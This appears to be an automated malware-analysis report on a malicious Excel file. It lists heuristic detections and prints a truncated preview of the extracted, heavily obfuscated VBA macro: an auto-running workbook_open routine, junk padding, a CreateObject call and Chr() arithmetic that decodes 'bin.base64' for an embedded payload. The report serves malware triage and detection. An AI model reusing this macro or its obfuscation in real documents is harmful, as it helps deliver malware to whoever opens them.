MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Workbook_Open event, which is a common technique for executing malicious code upon opening the document. The presence of obfuscated code and a 'CreateObject' call suggests the macro attempts to download and execute a secondary payload. The obfuscation method using split string literals is noted.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11924 bytes |
SHA-256: 6b04f2f58be0fdd5eb44fde6991a5ba4e62758a617d338ba6c6f32a85833b962 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
ErU_pWUS1yrJ.AfrLv4kxEWmTI9UYFHpr
While 7 = 37
Dim CcqJvFdeuX7nA As Boolean
Wend
Dim nvbzNaic7c As Worksheet
While 26 = 39
Dim wsl82TNTsECf As Boolean
Wend
Dim yfYnX_CpZ8SdL3 As Worksheet
While 27 = 40
Dim h1pFNE9lWCdflY As Boolean
Wend
Dim Hl45kNmRyvIW4vm As Worksheet
While 6 = 32
Dim xXGt8vVmlz7fLHV As Boolean
Wend
Dim I2blgxDX37ONB46 As Worksheet
While 1 = 46
Dim zJL8hmVummv As Boolean
Wend
Dim PDmrZIalQ5 As Worksheet
While 1 = 55
Dim PNyt_MwrfTs As Boolean
Wend
Dim p_vSMjrwEx As Worksheet
While 3 = 39
Dim tyvTNMy_jPn537 As Boolean
Wend
Dim GxmG85EaNjD1 As Worksheet
While 22 = 38
Dim WKirxKFQc_7n8 As Boolean
Wend
Dim h3asaAD2V_u_nF3 As Worksheet
While 18 = 40
Dim RiJPWzle1a As Boolean
Wend
Dim bxjbGz8HXA As Worksheet
While 9 = 42
Dim nqwi99AFwmIDMY As Boolean
Wend
Dim JYuWjrP529hOP As Worksheet
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ErU_pWUS1yrJ"
Dim HwCKBIG_ug_aIzmbdpT__GGK_qfr3jdmRpXzsaw5QIOrisA72pW_tNS_nzETlYEIC As String
Dim ZtiRd73Z2__zyL2p7nf5HEpNwCch2ee6VRmkJJvpNAR_ZhuW_jCQF6PSCSeacShVhCceiPdv2ypFwkwNP_bPbLxYBRgzoSK4b6eVDNxxEPXQOHfaeOIXzP3TNDcOsmEhmvmzEZJBOnJKxfI2uETY As String
Dim M_C8W6fkDzQxN1BFpOplW7vUrKy5OXr1G2KzhcahTEc3F_wTl_E5rFiPRpOKEjTnFYpVnJg As String
Dim Fcv9jhppTypnCM8rE4cUu8dIE1Bke6AApQMrvmhgdLYW7B_aF2F5BjQH8k2se_JWxo7u9O6bU5zghFLDuicly_8___sItyAYAAhQDSb16miEssj1Xw75jhhrp1u4euqf3Zefg49aFloJe1TOd As Integer
Function Eer1LkvkPXxeqMQXiJQrDjgosrywArqFI2fmTUKhlIEK4uLnpHpEkLze7C(CeH4Lrc3y6AtkOfHCYjXgkEgRNZb6JDkR1pLm_fIfbjNr_UtdPnGbKIaYjk7P_6n2Y)
While 16 = 46
Dim j6P6mkxNQJGAhdX As Boolean
Wend
Dim ba_nuNhhTc As Worksheet
While 19 = 51
Dim s8d_yl_YAdIuoMD As Boolean
Wend
Dim k1jomr5OsiQ As Worksheet
Dim lIuZdIBRVtrhAk_yZCZK9OrhpnJ_P6CIdY3BRQGMbdV2lo4hssv9s3_UZKsy8ABZqgDkq
While 24 = 58
Dim ILaQAW5a3mRNbg As Boolean
Wend
Dim Ckf_Mqv1iHV73 As Worksheet
While 17 = 54
Dim qtxqtYfb17sbv As Boolean
Wend
Dim zLTYRkGFjF As Worksheet
Dim stuFMZWIx3AlJFnGtzh5X9nCKzbFoYemRCnOXsDuQ1RQ7o8RixUVLItt_r4V8PdXVVRGbXr_vwmfoU_e2HfzCHZHR3Ioypw_V45jUzzIETiYfLDslWdxsmTM5IyhMCJ
While 2 = 56
Dim WOe2eRmR4CdM As Boolean
Wend
Dim qD6gx6DJmwgazhe As Worksheet
While 21 = 46
Dim HztyuElYZNgAH As Boolean
Wend
Dim MnxXPleOctwKC As Worksheet
While 16 = 33
Dim YcjrCA7vcbIMs As Boolean
Wend
Dim FDmdRP45789GIM As Worksheet
While 21 = 47
Dim BOo_7mrpHyrKfC As Boolean
Wend
Dim UsKnJgdak8 As Worksheet
Set stuFMZWIx3AlJFnGtzh5X9nCKzbFoYemRCnOXsDuQ1RQ7o8RixUVLItt_r4V8PdXVVRGbXr_vwmfoU_e2HfzCHZHR3Ioypw_V45jUzzIETiYfLDslWdxsmTM5IyhMCJ = CreateObject(ZtiRd73Z2__zyL2p7nf5HEpNwCch2ee6VRmkJJvpNAR_ZhuW_jCQF6PSCSeacShVhCceiPdv2ypFwkwNP_bPbLxYBRgzoSK4b6eVDNxxEPXQOHfaeOIXzP3TNDcOsmEhmvmzEZJBOnJKxfI2uETY)
While 24 = 42
Dim aePFbdji2v As Boolean
Wend
Dim fxVKiAZ5wv As Worksheet
While 1 = 57
Dim Ft1hLvT7lrj As Boolean
Wend
Dim mpmaVjLmNGR As Worksheet
HwCKBIG_ug_aIzmbdpT__GGK_qfr3jdmRpXzsaw5QIOrisA72pW_tNS_nzETlYEIC = Chr(452 - 354) & Chr(472 - 367) & Chr(421 - 311) & Chr(412 - 366) & Chr(400 - 302) & Chr(291 - 194) & Chr(139 - 24) & Chr(361 - 260) & Chr(394 - 340) & Chr(129 - 77)
While 9 = 32
Dim sHy5xakeDfwKTuX As Boolean
Wend
Dim hNrOlNCS3Gs As Worksheet
While 28 = 49
Dim sKZLPhnw_qsQ7 As Boolean
Wend
Dim UFnDydRo7B As Worksheet
Set lIuZdIBRVtrhAk_yZCZK9OrhpnJ_P6CIdY3BRQGMbdV2lo4hssv9s3_UZKsy8ABZqgDkq = stuFMZWIx3AlJFnGtzh5X9nCKzbFoYemRCnOXsDuQ1RQ7o8RixUVLItt_r4V8PdXVVRGbXr_vwmfoU_e2HfzCHZHR3Ioypw_V45jUzzIETiYfLDsl
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.